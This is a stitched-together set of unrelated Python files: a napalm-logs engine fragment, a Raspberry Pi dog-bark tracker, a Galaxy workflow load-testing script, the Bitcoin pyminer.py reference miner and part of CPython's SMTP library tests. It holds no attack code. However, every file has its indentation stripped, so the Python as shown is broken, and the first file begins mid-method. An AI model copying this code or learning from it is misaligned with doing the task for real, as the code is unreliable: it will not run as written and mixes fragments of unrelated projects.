# Check for device conifg, if there isn't anything then just log, do not raise an exception
for dev_os, dev_config in self.config_dict.items():
if not dev_config:
log.warning('No config found for %s', dev_os)
continue
# Compare the valid opts with the conifg
self._verify_config_dict(CONFIG.VALID_CONFIG, dev_config, dev_os)
log.debug('Read the config without error')
def _build_config(self):
'''
Build the config of the napalm syslog parser.
'''
if not self.config_dict:
if not self.config_path:
# No custom config path requested
# Read the native config files
self.config_path = os.path.join(
os.path.dirname(os.path.realpath(__file__)), 'config'
)
log.info('Reading the configuration from %s', self.config_path)
self.config_dict = self._load_config(self.config_path)
if (
not self.extension_config_dict
and self.extension_config_path
and os.path.normpath(self.extension_config_path)
!= os.path.normpath(self.config_path)
): # same path?
# When extension config is not sent as dict
# But `extension_config_path` is specified
log.info(
'Reading extension configuration from %s', self.extension_config_path
)
self.extension_config_dict = self._load_config(self.extension_config_path)
if self.extension_config_dict:
napalm_logs.utils.dictupdate(
self.config_dict, self.extension_config_dict
) # deep merge
def _start_auth_proc(self):
'''
Start the authenticator process.
'''
log.debug('Computing the signing key hex')
verify_key = self.__signing_key.verify_key
sgn_verify_hex = verify_key.encode(encoder=nacl.encoding.HexEncoder)
log.debug('Starting the authenticator subprocess')
auth = NapalmLogsAuthProc(
self.certificate,
self.keyfile,
self.__priv_key,
sgn_verify_hex,
self.auth_address,
self.auth_port,
)
proc = Process(target=auth.start)
proc.start()
proc.description = 'Auth process'
log.debug('Started auth process as %s with PID %s', proc._name, proc.pid)
return proc
def _start_lst_proc(self, listener_type, listener_opts):
'''
Start the listener process.
'''
log.debug('Starting the listener process for %s', listener_type)
listener = NapalmLogsListenerProc(
self.opts,
self.address,
self.port,
listener_type,
listener_opts=listener_opts,
)
proc = Process(target=listener.start)
proc.start()
proc.description = 'Listener process'
log.debug('Started listener process as %s with PID %s', proc._name, proc.pid)
return proc
def _start_srv_proc(self, started_os_proc):
'''
Start the server process.
'''
log.debug('Starting the server process')
server = NapalmLogsServerProc(
self.opts, self.config_dict, started_os_proc, buffer=self._buffer
)
proc = Process(target=server.start)
proc.start()
proc.description = 'Server process'
log.debug('Started server process as %s with PID %s', proc._name, proc.pid)
return proc
def _start_pub_px_proc(self):
'''
'''
px = NapalmLogsPublisherProxy(self.opts['hwm'])
proc = Process(target=px.start)
proc.start()
proc.description = 'Publisher proxy process'
log.debug('Started pub proxy as %s with PID %s', proc._name, proc.pid)
return proc
def _start_pub_proc(self, publisher_type, publisher_opts, pub_id):
'''
Start the publisher process.
'''
log.debug('Starting the publisher process for %s', publisher_type)
publisher = NapalmLogsPublisherProc(
self.opts,
self.publish_address,
self.publish_port,
publisher_type,
self.serializer,
self.__priv_key,
self.__signing_key,
publisher_opts,
disable_security=self.disable_security,
pub_id=pub_id,
)
proc = Process(target=publisher.start)
proc.start()
proc.description = 'Publisher process'
log.debug('Started publisher process as %s with PID %s', proc._name, proc.pid)
return proc
def _start_dev_proc(self, device_os, device_config):
'''
Start the device worker process.
'''
log.info('Starting the child process for %s', device_os)
dos = NapalmLogsDeviceProc(device_os, self.opts, device_config)
os_proc = Process(target=dos.start)
os_proc.start()
os_proc.description = '%s device process' % device_os
log.debug(
'Started process %s for %s, having PID %s',
os_proc._name,
device_os,
os_proc.pid,
)
return os_proc
def start_engine(self):
'''
Start the child processes (one per device OS)
'''
if self.disable_security is True:
log.warning(
'***Not starting the authenticator process due to disable_security being set to True***'
)
else:
log.debug('Generating the private key')
self.__priv_key = nacl.utils.random(nacl.secret.SecretBox.KEY_SIZE)
log.debug('Generating the signing key')
self.__signing_key = nacl.signing.SigningKey.generate()
# start the keepalive thread for the auth sub-process
self._processes.append(self._start_auth_proc())
log.debug('Starting the internal proxy')
proc = self._start_pub_px_proc()
self._processes.append(proc)
# publisher process start
pub_id = 0
for pub in self.publisher:
publisher_type, publisher_opts = list(pub.items())[0]
proc = self._start_pub_proc(publisher_type, publisher_opts, pub_id)
self._processes.append(proc)
pub_id += 1
# device process start
log.info('Starting child processes for each device type')
started_os_proc = []
for device_os, device_config in self.config_dict.items():
if not self._whitelist_blacklist(device_os):
log.debug(
'Not starting process for %s (whitelist-blacklist logic)', device_os
)
# Ignore devices that are not in the whitelist (if defined),
# or those operating systems that are on the blacklist.
# This way we can prevent starting unwanted sub-processes.
continue
log.debug(
'Will start %d worker process(es) for %s',
self.device_worker_processes,
device_os,
)
for proc_index in range(self.device_worker_processes):
self._processes.append(self._start_dev_proc(device_os, device_config))
started_os_proc.append(device_os)
# start the server process
self._processes.append(self._start_srv_proc(started_os_proc))
# start listener process
for lst in self.listener:
listener_type, listener_opts = list(lst.items())[0]
proc = self._start_lst_proc(listener_type, listener_opts)
self._processes.append(proc)
thread = threading.Thread(target=self._check_children)
thread.start()
def _check_children(self):
'''
Check all of the child processes are still running
'''
while self.up:
time.sleep(1)
for process in self._processes:
if process.is_alive() is True:
continue
log.debug(
'%s is dead. Stopping the napalm-logs engine.', process.description
)
self.stop_engine()
def stop_engine(self):
self.up = False
log.info('Shutting down the engine')
# Set SIGTERM to all child processes, then join them
for proc in self._processes:
proc.terminate()
for proc in self._processes:
proc.join()
|
main.py
|
#!/usr/bin/env python3
'''
The main file to run. Process that runs indefinitely, and listens for button presses to start or stop the bark tracking.
'''
import datetime
import time
import signal
import sys
import logging
from threading import Thread, Event, Lock
from aiy.board import Board, Led
import aiy.voice.tts as googlevoice
import settings
from daytime import Daytime
from barkservice import Barksession
from sonosservice import Sonosservice
from lifxservice import Lifxservice
from gmailsender import Gmailsender
logging.basicConfig(filename='/home/pi/logs/barktracker-{}.log'.format(time.strftime("%Y%m%d-%H%M%S")),
format='%(asctime)s,%(msecs)d %(name)s %(levelname)s %(message)s',
datefmt='%H:%M:%S',
level=logging.INFO)
class ButtonListener(object):
def __init__(self):
self._board = Board()
self._tracker_active = False
self._ui_thread = Thread(target=self._button_listen)
self._debug = settings.DEBUG
self._services = []
self._lock = Lock()
signal.signal(signal.SIGINT, self._shutdown)
def run(self):
self._board.led.state = Led.OFF
self._ui_thread.start()
def _button_listen(self):
self._board.button.when_pressed = lambda : self._toggle_button()
logging.info("BarkTracker is loaded. Press the button to get started.")
if self._debug:
self._toggle_button()
else:
self._board.led.state = Led.BLINK
time.sleep(10)
self._board.led.state = Led.OFF
Event().wait()
def _toggle_button(self):
if self._tracker_active:
self._stop_tracker()
else:
self._start_tracker()
def _start_tracker(self):
logging.info("Tracker started.")
self._board.led.state = Led.ON
self._tracker_active = True
if not self._debug:
googlevoice.say('Starting Barktracker.')
time.sleep(2)
self._lock.acquire()
self._services = create_services()
for service in self._services:
try:
bg_thread = Thread(target=service.start)
bg_thread.start()
except Exception as e:
logging.error("Could not start service of class {}. Error: {}".format(service.__class__.__name__, e))
self._lock.release()
def _stop_tracker(self):
logging.info("Tracker stopped.")
self._board.led.state = Led.OFF
self._tracker_active = False
summaries = []
self._lock.acquire()
for service in self._services:
try:
service.stop()
summaries.append(service.generate_summary())
except Exception as e:
logging.error("Could not stop service of class {}. Error: {}".format(service.__class__.__name__, e))
self._services = None
self._lock.release()
if not self._debug:
googlevoice.say(
"Good {}. Welcome back. Here's your summary: ".format(Daytime.part_of_day()))
for summary in filter(None, summaries):
logging.info(summary)
googlevoice.say(summary)
def _shutdown(self, sig, frame):
self._board.led.state = Led.OFF
sys.exit(0)
def create_services():
gmail_sender = Gmailsender(settings.GMAIL_USER,
settings.GMAIL_PASSWORD,
from_name=settings.FROM_NAME,
from_email=settings.FROM_EMAIL,
debug=settings.DEBUG)
bark_tracker = Barksession(
dog=settings.DOG,
gmail_sender=gmail_sender,
recipients=settings.RECIPIENTS,
use_ai=settings.USE_AI,
ai_labels=settings.AI_LABELS,
bark_label=settings.BARK_LABEL,
ai_graph=settings.AI_GRAPH,
ambient_db=settings.AMBIENT_DB,
debug=settings.DEBUG)
sonos_service = Sonosservice(debug=settings.DEBUG)
lifx_service = Lifxservice(location=settings.LOCATION,
debug=settings.DEBUG)
return [bark_tracker, sonos_service, lifx_service]
def main():
ButtonListener().run()
if __name__ == '__main__':
print("Initializing BarkTracker ...")
main()
|
workflows_scaling.py
|
#!/usr/bin/env python
"""A small script to drive workflow performance testing.
% ./test/manual/launch_and_run.sh workflows_scaling --collection_size 500 --workflow_depth 4
$ .venv/bin/python scripts/summarize_timings.py --file /tmp/<work_dir>/handler1.log --pattern 'Workflow step'
$ .venv/bin/python scripts/summarize_timings.py --file /tmp/<work_dir>/handler1.log --pattern 'Created step'
"""
import functools
import json
import os
import random
import sys
from argparse import ArgumentParser
from threading import Thread
from uuid import uuid4
from bioblend import galaxy
galaxy_root = os.path.abspath(os.path.join(os.path.dirname(__file__), os.path.pardir, os.path.pardir))
sys.path[1:1] = [os.path.join(galaxy_root, "lib"), os.path.join(galaxy_root, "test")]
from base.populators import ( # noqa: I100
GiDatasetCollectionPopulator,
GiDatasetPopulator,
GiWorkflowPopulator,
)
from api.workflows_format_2.converter import python_to_workflow # noqa: I100
LONG_TIMEOUT = 1000000000
DESCRIPTION = "Script to exercise the workflow engine."
def main(argv=None):
"""Entry point for workflow driving."""
arg_parser = ArgumentParser(description=DESCRIPTION)
arg_parser.add_argument("--api_key", default="testmasterapikey")
arg_parser.add_argument("--host", default="http://localhost:8080/")
arg_parser.add_argument("--collection_size", type=int, default=20)
arg_parser.add_argument("--schedule_only_test", default=False, action="store_true")
arg_parser.add_argument("--workflow_depth", type=int, default=10)
arg_parser.add_argument("--workflow_count", type=int, default=1)
group = arg_parser.add_mutually_exclusive_group()
group.add_argument("--two_outputs", default=False, action="store_true")
group.add_argument("--wave_simple", default=False, action="store_true")
args = arg_parser.parse_args(argv)
uuid = str(uuid4())
workflow_struct = _workflow_struct(args, uuid)
has_input = any([s.get("type", "tool") == "input_collection" for s in workflow_struct])
if not has_input:
uuid = None
gi = _gi(args)
workflow = python_to_workflow(workflow_struct)
workflow_info = gi.workflows.import_workflow_json(workflow)
workflow_id = workflow_info["id"]
target = functools.partial(_run, args, gi, workflow_id, uuid)
threads = []
for i in range(args.workflow_count):
t = Thread(target=target)
t.daemon = True
t.start()
threads.append(t)
for t in threads:
t.join()
def _run(args, gi, workflow_id, uuid):
dataset_populator = GiDatasetPopulator(gi)
dataset_collection_populator = GiDatasetCollectionPopulator(gi)
history_id = dataset_populator.new_history()
if uuid is not None:
contents = []
for i in range(args.collection_size):
contents.append("random dataset number #%d" % i)
hdca = dataset_collection_populator.create_list_in_history(history_id, contents=contents).json()
label_map = {
uuid: {"src": "hdca", "id": hdca["id"]},
}
else:
label_map = {}
workflow_request = dict(
history="hist_id=%s" % history_id,
)
workflow_request["inputs"] = json.dumps(label_map)
url = "workflows/%s/usage" % (workflow_id)
invoke_response = dataset_populator._post(url, data=workflow_request).json()
invocation_id = invoke_response["id"]
workflow_populator = GiWorkflowPopulator(gi)
if args.schedule_only_test:
workflow_populator.wait_for_invocation(
workflow_id,
invocation_id,
timeout=LONG_TIMEOUT,
)
else:
workflow_populator.wait_for_workflow(
workflow_id,
invocation_id,
history_id,
timeout=LONG_TIMEOUT,
)
def _workflow_struct(args, input_uuid):
if args.two_outputs:
return _workflow_struct_two_outputs(args, input_uuid)
elif args.wave_simple:
return _workflow_struct_wave(args, input_uuid)
else:
return _workflow_struct_simple(args, input_uuid)
def _workflow_struct_simple(args, input_uuid):
workflow_struct = [
{"tool_id": "create_input_collection", "state": {"collection_size": args.collection_size}},
{"tool_id": "cat", "state": {"input1": _link(0, "output")}}
]
workflow_depth = args.workflow_depth
for i in range(workflow_depth):
link = str(i + 1) + "#out_file1"
workflow_struct.append(
{"tool_id": "cat", "state": {"input1": _link(link)}}
)
return workflow_struct
def _workflow_struct_two_outputs(args, input_uuid):
workflow_struct = [
{"type": "input_collection", "uuid": input_uuid},
{"tool_id": "cat", "state": {"input1": _link(0), "input2": _link(0)}}
]
workflow_depth = args.workflow_depth
for i in range(workflow_depth):
link1 = str(i + 1) + "#out_file1"
link2 = str(i + 1) + "#out_file2"
workflow_struct.append(
{"tool_id": "cat", "state": {"input1": _link(link1), "input2": _link(link2)}}
)
return workflow_struct
def _workflow_struct_wave(args, input_uuid):
workflow_struct = [
{"tool_id": "create_input_collection", "state": {"collection_size": args.collection_size}},
{"tool_id": "cat_list", "state": {"input1": _link(0, "output")}}
]
workflow_depth = args.workflow_depth
for i in range(workflow_depth):
step = i + 2
if step % 2 == 1:
workflow_struct += [{"tool_id": "cat_list", "state": {"input1": _link(step - 1, "output")}}]
else:
workflow_struct += [{"tool_id": "split", "state": {"input1": _link(step - 1, "out_file1")}}]
return workflow_struct
def _link(link, output_name=None):
if output_name is not None:
link = str(link) + "#" + output_name
return {"$link": link}
def _gi(args):
gi = galaxy.GalaxyInstance(args.host, key=args.api_key)
name = "wftest-user-%d" % random.randint(0, 1000000)
user = gi.users.create_local_user(name, "%s@galaxytesting.dev" % name, "pass123")
user_id = user["id"]
api_key = gi.users.create_user_apikey(user_id)
user_gi = galaxy.GalaxyInstance(args.host, api_key)
return user_gi
if __name__ == "__main__":
main()
|
pyminer.py
|
#!/usr/bin/python
#
# Copyright (c) 2011 The Bitcoin developers
# Distributed under the MIT/X11 software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
import time
import json
import pprint
import hashlib
import struct
import re
import base64
import httplib
import sys
from multiprocessing import Process
ERR_SLEEP = 15
MAX_NONCE = 1000000L
settings = {}
pp = pprint.PrettyPrinter(indent=4)
class BitcoinRPC:
OBJID = 1
def __init__(self, host, port, username, password):
authpair = "%s:%s" % (username, password)
self.authhdr = "Basic %s" % (base64.b64encode(authpair))
self.conn = httplib.HTTPConnection(host, port, False, 30)
def rpc(self, method, params=None):
self.OBJID += 1
obj = { 'version' : '1.1',
'method' : method,
'id' : self.OBJID }
if params is None:
obj['params'] = []
else:
obj['params'] = params
self.conn.request('POST', '/', json.dumps(obj),
{ 'Authorization' : self.authhdr,
'Content-type' : 'application/json' })
resp = self.conn.getresponse()
if resp is None:
print "JSON-RPC: no response"
return None
body = resp.read()
resp_obj = json.loads(body)
if resp_obj is None:
print "JSON-RPC: cannot JSON-decode body"
return None
if 'error' in resp_obj and resp_obj['error'] != None:
return resp_obj['error']
if 'result' not in resp_obj:
print "JSON-RPC: no result in object"
return None
return resp_obj['result']
def getblockcount(self):
return self.rpc('getblockcount')
def getwork(self, data=None):
return self.rpc('getwork', data)
def uint32(x):
return x & 0xffffffffL
def bytereverse(x):
return uint32(( ((x) << 24) | (((x) << 8) & 0x00ff0000) |
(((x) >> 8) & 0x0000ff00) | ((x) >> 24) ))
def bufreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
word = struct.unpack('@I', in_buf[i:i+4])[0]
out_words.append(struct.pack('@I', bytereverse(word)))
return ''.join(out_words)
def wordreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
out_words.append(in_buf[i:i+4])
out_words.reverse()
return ''.join(out_words)
class Miner:
def __init__(self, id):
self.id = id
self.max_nonce = MAX_NONCE
def work(self, datastr, targetstr):
# decode work data hex string to binary
static_data = datastr.decode('hex')
static_data = bufreverse(static_data)
# the first 76b of 80b do not change
blk_hdr = static_data[:76]
# decode 256-bit target value
targetbin = targetstr.decode('hex')
targetbin = targetbin[::-1] # byte-swap and dword-swap
targetbin_str = targetbin.encode('hex')
target = long(targetbin_str, 16)
# pre-hash first 76b of block header
static_hash = hashlib.sha256()
static_hash.update(blk_hdr)
for nonce in xrange(self.max_nonce):
# encode 32-bit nonce value
nonce_bin = struct.pack("<I", nonce)
# hash final 4b, the nonce value
hash1_o = static_hash.copy()
hash1_o.update(nonce_bin)
hash1 = hash1_o.digest()
# sha256 hash of sha256 hash
hash_o = hashlib.sha256()
hash_o.update(hash1)
hash = hash_o.digest()
# quick test for winning solution: high 32 bits zero?
if hash[-4:] != '\0\0\0\0':
continue
# convert binary hash to 256-bit Python long
hash = bufreverse(hash)
hash = wordreverse(hash)
hash_str = hash.encode('hex')
l = long(hash_str, 16)
# proof-of-work test: hash < target
if l < target:
print time.asctime(), "PROOF-OF-WORK found: %064x" % (l,)
return (nonce + 1, nonce_bin)
else:
print time.asctime(), "PROOF-OF-WORK false positive %064x" % (l,)
# return (nonce + 1, nonce_bin)
return (nonce + 1, None)
def submit_work(self, rpc, original_data, nonce_bin):
nonce_bin = bufreverse(nonce_bin)
nonce = nonce_bin.encode('hex')
solution = original_data[:152] + nonce + original_data[160:256]
param_arr = [ solution ]
result = rpc.getwork(param_arr)
print time.asctime(), "--> Upstream RPC result:", result
def iterate(self, rpc):
work = rpc.getwork()
if work is None:
time.sleep(ERR_SLEEP)
return
if 'data' not in work or 'target' not in work:
time.sleep(ERR_SLEEP)
return
time_start = time.time()
(hashes_done, nonce_bin) = self.work(work['data'],
work['target'])
time_end = time.time()
time_diff = time_end - time_start
self.max_nonce = long(
(hashes_done * settings['scantime']) / time_diff)
if self.max_nonce > 0xfffffffaL:
self.max_nonce = 0xfffffffaL
if settings['hashmeter']:
print "HashMeter(%d): %d hashes, %.2f Khash/sec" % (
self.id, hashes_done,
(hashes_done / 1000.0) / time_diff)
if nonce_bin is not None:
self.submit_work(rpc, work['data'], nonce_bin)
def loop(self):
rpc = BitcoinRPC(settings['host'], settings['port'],
settings['rpcuser'], settings['rpcpass'])
if rpc is None:
return
while True:
self.iterate(rpc)
def miner_thread(id):
miner = Miner(id)
miner.loop()
if __name__ == '__main__':
if len(sys.argv) != 2:
print "Usage: pyminer.py CONFIG-FILE"
sys.exit(1)
f = open(sys.argv[1])
for line in f:
# skip comment lines
m = re.search('^\s*#', line)
if m:
continue
# parse key=value lines
m = re.search('^(\w+)\s*=\s*(\S.*)$', line)
if m is None:
continue
settings[m.group(1)] = m.group(2)
f.close()
if 'host' not in settings:
settings['host'] = '127.0.0.1'
if 'port' not in settings:
settings['port'] = 10052
if 'threads' not in settings:
settings['threads'] = 1
if 'hashmeter' not in settings:
settings['hashmeter'] = 0
if 'scantime' not in settings:
settings['scantime'] = 30L
if 'rpcuser' not in settings or 'rpcpass' not in settings:
print "Missing username and/or password in cfg file"
sys.exit(1)
settings['port'] = int(settings['port'])
settings['threads'] = int(settings['threads'])
settings['hashmeter'] = int(settings['hashmeter'])
settings['scantime'] = long(settings['scantime'])
thr_list = []
for thr_id in range(settings['threads']):
p = Process(target=miner_thread, args=(thr_id,))
p.start()
thr_list.append(p)
time.sleep(1) # stagger threads
print settings['threads'], "mining threads started"
print time.asctime(), "Miner Starts - %s:%s" % (settings['host'], settings['port'])
try:
for thr_proc in thr_list:
thr_proc.join()
except KeyboardInterrupt:
pass
print time.asctime(), "Miner Stops - %s:%s" % (settings['host'], settings['port'])
|
test_smtplib.py
|
import asyncore
import base64
import email.mime.text
from email.message import EmailMessage
from email.base64mime import body_encode as encode_base64
import email.utils
import hmac
import socket
import smtpd
import smtplib
import io
import re
import sys
import time
import select
import errno
import textwrap
import unittest
from test import support, mock_socket
try:
import threading
except ImportError:
threading = None
HOST = support.HOST
if sys.platform == 'darwin':
# select.poll returns a select.POLLHUP at the end of the tests
# on darwin, so just ignore it
def handle_expt(self):
pass
smtpd.SMTPChannel.handle_expt = handle_expt
def server(evt, buf, serv):
serv.listen()
evt.set()
try:
conn, addr = serv.accept()
except socket.timeout:
pass
else:
n = 500
while buf and n > 0:
r, w, e = select.select([], [conn], [])
if w:
sent = conn.send(buf)
buf = buf[sent:]
n -= 1
conn.close()
finally:
serv.close()
evt.set()
class GeneralTests(unittest.TestCase):
def setUp(self):
smtplib.socket = mock_socket
self.port = 25
def tearDown(self):
smtplib.socket = socket
# This method is no longer used but is retained for backward compatibility,
# so test to make sure it still works.
def testQuoteData(self):
teststr = "abc\n.jkl\rfoo\r\n..blue"
expected = "abc\r\n..jkl\r\nfoo\r\n...blue"
self.assertEqual(expected, smtplib.quotedata(teststr))
def testBasic1(self):
mock_socket.reply_with(b"220 Hola mundo")
# connects
smtp = smtplib.SMTP(HOST, self.port)
smtp.close()
def testSourceAddress(self):
mock_socket.reply_with(b"220 Hola mundo")
# connects
smtp = smtplib.SMTP(HOST, self.port,
source_address=('127.0.0.1',19876))
self.assertEqual(smtp.source_address, ('127.0.0.1', 19876))
smtp.close()
def testBasic2(self):
mock_socket.reply_with(b"220 Hola mundo")
# connects, include port in host name
smtp = smtplib.SMTP("%s:%s" % (HOST, self.port))
smtp.close()
def testLocalHostName(self):
mock_socket.reply_with(b"220 Hola mundo")
# check that supplied local_hostname is used
smtp = smtplib.SMTP(HOST, self.port, local_hostname="testhost")
self.assertEqual(smtp.local_hostname, "testhost")
smtp.close()
def testTimeoutDefault(self):
mock_socket.reply_with(b"220 Hola mundo")
self.assertIsNone(mock_socket.getdefaulttimeout())
mock_socket.setdefaulttimeout(30)
self.assertEqual(mock_socket.getdefaulttimeout(), 30)
try:
smtp = smtplib.SMTP(HOST, self.port)
finally:
mock_socket.setdefaulttimeout(None)
self.assertEqual(smtp.sock.gettimeout(), 30)
smtp.close()
def testTimeoutNone(self):
mock_socket.reply_with(b"220 Hola mundo")
self.assertIsNone(socket.getdefaulttimeout())
socket.setdefaulttimeout(30)
try:
smtp = smtplib.SMTP(HOST, self.port, timeout=None)
finally:
socket.setdefaulttimeout(None)
self.assertIsNone(smtp.sock.gettimeout())
smtp.close()
def testTimeoutValue(self):
mock_socket.reply_with(b"220 Hola mundo")
smtp = smtplib.SMTP(HOST, self.port, timeout=30)
self.assertEqual(smtp.sock.gettimeout(), 30)
smtp.close()
def test_debuglevel(self):
mock_socket.reply_with(b"220 Hello world")
smtp = smtplib.SMTP()
smtp.set_debuglevel(1)
with support.captured_stderr() as stderr:
smtp.connect(HOST, self.port)
smtp.close()
expected = re.compile(r"^connect:", re.MULTILINE)
self.assertRegex(stderr.getvalue(), expected)
def test_debuglevel_2(self):
mock_socket.reply_with(b"220 Hello world")
smtp = smtplib.SMTP()
smtp.set_debuglevel(2)
with support.captured_stderr() as stderr:
smtp.connect(HOST, self.port)
smtp.close()
expected = re.compile(r"^\d{2}:\d{2}:\d{2}\.\d{6} connect: ",
re.MULTILINE)
self.assertRegex(stderr.getvalue(), expected)
# Test server thread using the specified SMTP server class
def debugging_server(serv, serv_evt, client_evt):
serv_evt.set()
try:
if hasattr(select, 'poll'):
poll_fun = asyncore.poll2
else:
poll_fun = asyncore.poll
n = 1000
while asyncore.socket_map and n > 0:
poll_fun(0.01, asyncore.socket_map)
# when the client conversation is finished, it will
# set client_evt, and it's then ok to kill the server
if client_evt.is_set():
serv.close()
break
n -= 1
except socket.timeout:
pass
finally:
if not client_evt.is_set():
# allow some time for the client to read the result
time.sleep(0.5)
serv.close()
asyncore.close_all()
serv_evt.set()
MSG_BEGIN = '---------- MESSAGE FOLLOWS ----------\n'
MSG_END = '------------ END MESSAGE ------------\n'
# NOTE: Some SMTP objects in the tests below are created with a non-default
# local_hostname argument to the constructor, since (on some systems) the FQDN
# lookup caused by the default local_hostname sometimes takes so long that the
# test server times out, causing the test to fail.
# Test behavior of smtpd.DebuggingServer
@unittest.skipUnless(threading, 'Threading required for this test.')
class DebuggingServerTests(unittest.TestCase):
maxDiff = None
def setUp(self):
self.real_getfqdn = socket.getfqdn
socket.getfqdn = mock_socket.getfqdn
# temporarily replace sys.stdout to capture DebuggingServer output
self.old_stdout = sys.stdout
self.output = io.StringIO()
sys.stdout = self.output
self.serv_evt = threading.Event()
self.client_evt = threading.Event()
# Capture SMTPChannel debug output
self.old_DEBUGSTREAM = smtpd.DEBUGSTREAM
smtpd.DEBUGSTREAM = io.StringIO()
# Pick a random unused port by passing 0 for the port number
self.serv = smtpd.DebuggingServer((HOST, 0), ('nowhere', -1),
decode_data=True)
# Keep a note of what port was assigned
self.port = self.serv.socket.getsockname()[1]
serv_args = (self.serv, self.serv_evt, self.client_evt)
self.thread = threading.Thread(target=debugging_server, args=serv_args)
self.thread.start()
# wait until server thread has assigned a port number
self.serv_evt.wait()
self.serv_evt.clear()
def tearDown(self):
socket.getfqdn = self.real_getfqdn
# indicate that the client is finished
self.client_evt.set()
# wait for the server thread to terminate
self.serv_evt.wait()
self.thread.join()
# restore sys.stdout
sys.stdout = self.old_stdout
# restore DEBUGSTREAM
smtpd.DEBUGSTREAM.close()
smtpd.DEBUGSTREAM = self.old_DEBUGSTREAM
def testBasic(self):
# connect
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
smtp.quit()
def testSourceAddress(self):
# connect
port = support.find_unused_port()
try:
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=3, source_address=('127.0.0.1', port))
self.assertEqual(smtp.source_address, ('127.0.0.1', port))
self.assertEqual(smtp.local_hostname, 'localhost')
smtp.quit()
except OSError as e:
if e.errno == errno.EADDRINUSE:
self.skipTest("couldn't bind to port %d" % port)
raise
def testNOOP(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
expected = (250, b'OK')
self.assertEqual(smtp.noop(), expected)
smtp.quit()
def testRSET(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
expected = (250, b'OK')
self.assertEqual(smtp.rset(), expected)
smtp.quit()
def testELHO(self):
# EHLO isn't implemented in DebuggingServer
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
expected = (250, b'\nSIZE 33554432\nHELP')
self.assertEqual(smtp.ehlo(), expected)
smtp.quit()
def testEXPNNotImplemented(self):
# EXPN isn't implemented in DebuggingServer
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
expected = (502, b'EXPN not implemented')
smtp.putcmd('EXPN')
self.assertEqual(smtp.getreply(), expected)
smtp.quit()
def testVRFY(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
expected = (252, b'Cannot VRFY user, but will accept message ' + \
b'and attempt delivery')
self.assertEqual(smtp.vrfy('nobody@nowhere.com'), expected)
self.assertEqual(smtp.verify('nobody@nowhere.com'), expected)
smtp.quit()
def testSecondHELO(self):
# check that a second HELO returns a message that it's a duplicate
# (this behavior is specific to smtpd.SMTPChannel)
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
smtp.helo()
expected = (503, b'Duplicate HELO/EHLO')
self.assertEqual(smtp.helo(), expected)
smtp.quit()
def testHELP(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
self.assertEqual(smtp.help(), b'Supported commands: EHLO HELO MAIL ' + \
b'RCPT DATA RSET NOOP QUIT VRFY')
smtp.quit()
def testSend(self):
# connect and send mail
m = 'A test message'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
smtp.sendmail('John', 'Sally', m)
# XXX(nnorwitz): this test is flaky and dies with a bad file descriptor
# in asyncore. This sleep might help, but should really be fixed
# properly by using an Event variable.
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
mexpect = '%s%s\n%s' % (MSG_BEGIN, m, MSG_END)
self.assertEqual(self.output.getvalue(), mexpect)
def testSendBinary(self):
m = b'A test message'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
smtp.sendmail('John', 'Sally', m)
# XXX (see comment in testSend)
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
mexpect = '%s%s\n%s' % (MSG_BEGIN, m.decode('ascii'), MSG_END)
self.assertEqual(self.output.getvalue(), mexpect)
def testSendNeedingDotQuote(self):
# Issue 12283
m = '.A test\n.mes.sage.'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
smtp.sendmail('John', 'Sally', m)
# XXX (see comment in testSend)
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
mexpect = '%s%s\n%s' % (MSG_BEGIN, m, MSG_END)
self.assertEqual(self.output.getvalue(), mexpect)
def testSendNullSender(self):
m = 'A test message'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
smtp.sendmail('<>', 'Sally', m)
# XXX (see comment in testSend)
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
mexpect = '%s%s\n%s' % (MSG_BEGIN, m, MSG_END)
self.assertEqual(self.output.getvalue(), mexpect)
debugout = smtpd.DEBUGSTREAM.getvalue()
sender = re.compile("^sender: <>$", re.MULTILINE)
self.assertRegex(debugout, sender)
def testSendMessage(self):
m = email.mime.text.MIMEText('A test message')
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
smtp.send_message(m, from_addr='John', to_addrs='Sally')
# XXX (see comment in testSend)
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
# Add the X-Peer header that DebuggingServer adds
m['X-Peer'] = socket.gethostbyname('localhost')
mexpect = '%s%s\n%s' % (MSG_BEGIN, m.as_string(), MSG_END)
self.assertEqual(self.output.getvalue(), mexpect)
def testSendMessageWithAddresses(self):
m = email.mime.text.MIMEText('A test message')
m['From'] = 'foo@bar.com'
m['To'] = 'John'
m['CC'] = 'Sally, Fred'
m['Bcc'] = 'John Root <root@localhost>, "Dinsdale" <warped@silly.walks.com>'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
smtp.send_message(m)
# XXX (see comment in testSend)
time.sleep(0.01)
smtp.quit()
# make sure the Bcc header is still in the message.
self.assertEqual(m['Bcc'], 'John Root <root@localhost>, "Dinsdale" '
'<warped@silly.walks.com>')
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
# Add the X-Peer header that DebuggingServer adds
m['X-Peer'] = socket.gethostbyname('localhost')
# The Bcc header should not be transmitted.
del m['Bcc']
